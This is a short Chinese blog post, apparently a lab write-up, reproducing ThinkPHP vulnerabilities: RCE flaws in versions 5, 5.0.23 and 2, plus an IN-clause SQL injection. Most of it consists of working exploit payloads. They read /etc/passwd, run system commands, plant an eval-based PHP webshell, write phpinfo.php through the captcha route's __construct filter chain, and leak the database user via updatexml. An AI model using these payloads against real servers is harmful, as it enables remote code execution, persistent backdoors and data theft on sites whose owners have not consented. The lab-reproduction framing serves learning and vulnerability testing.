thinkphp 漏洞复现

ThinkPHP 5-Rce

打开就看到thinkphp版本 thinkphpV5  

常见的playload  查看passwd

?s=index/\think\Lang/load&file=/etc/passwd

查看当前用户

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

写入后门webshell

?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=<?php @eval($_POST['attack']);?>

其实用thinkphp综合利用的工具会更快利用漏洞 一键监测一键利用 

ThinkPHP 5.0.23-Rce

这个版本漏洞可以改变Request类任意方法并构造利用链从而导致远程代码执行漏洞。

启动靶场 又是熟悉的界面

利用的话 改为POST 后面还要接 

/index.php?s=captcha

内容利用要用 后面接上了写入一个phpinfo.php

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo "<?php info();?>">phpinfo.php

直接thinkphp框架漏洞利用工具使用工具 写入PHPINFO.php 

ThinkPHP 2-Rce

该版本感觉和5-RCE差不多 也是通过远程执行恶意代码

打开界面  POC直接在连接后面接上 当然也可以直接写后门进去 但是我懒 主要做复现

?s=/index/index/name/${@phpinfo()} 

ThinkPHP IN SQL INJECTION

打开靶场是白茫茫的一片 看了一下这个漏洞好像不允许子查询 也就是说这个就只能看看信息 算一个信息泄露级的漏洞 

POC直接回显报敏感信息

?ids[0,updatexml(0,concat(0xa,user()),0)]=1

  • 7
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值